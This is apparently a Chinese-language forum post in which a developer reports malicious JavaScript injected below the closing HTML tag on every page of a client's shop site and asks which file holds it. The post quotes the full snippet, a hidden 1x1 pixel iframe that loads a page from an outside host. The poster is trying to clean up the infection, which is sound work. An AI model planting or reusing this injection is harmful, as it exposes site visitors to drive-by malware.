我的客户今天打电话给我,告诉我后端的某些功能突然停止工作。快速浏览后,我发现该网站在最后一个 html 标记下方包含恶意代码。这是代码:
<script type="text/javascript">
(function () {
var zg = document.createElement('iframe');
zg.src = 'http://impactrl.de/chat/esd.php';
zg.style.position = 'absolute';
zg.style.border = '0'; zg.style.height = '1px';
zg.style.width = '1px'; zg.style.left = '1px';
zg.style.top = '1px';
if (!document.getElementById('zg')) {
document.write('<div id=\'zg\'></div>');
document.getElementById('zg').appendChild(zg);
}})();
</script>
我的客户还告诉我,他下载了一些软件,可以让他在桌面上运行他的商店。我敢打赌,这就是问题所在。
但是,我想摆脱那段代码,但我在任何文件中都找不到它。它在所有后端和前端页面上。
有谁知道我必须查看哪个文件?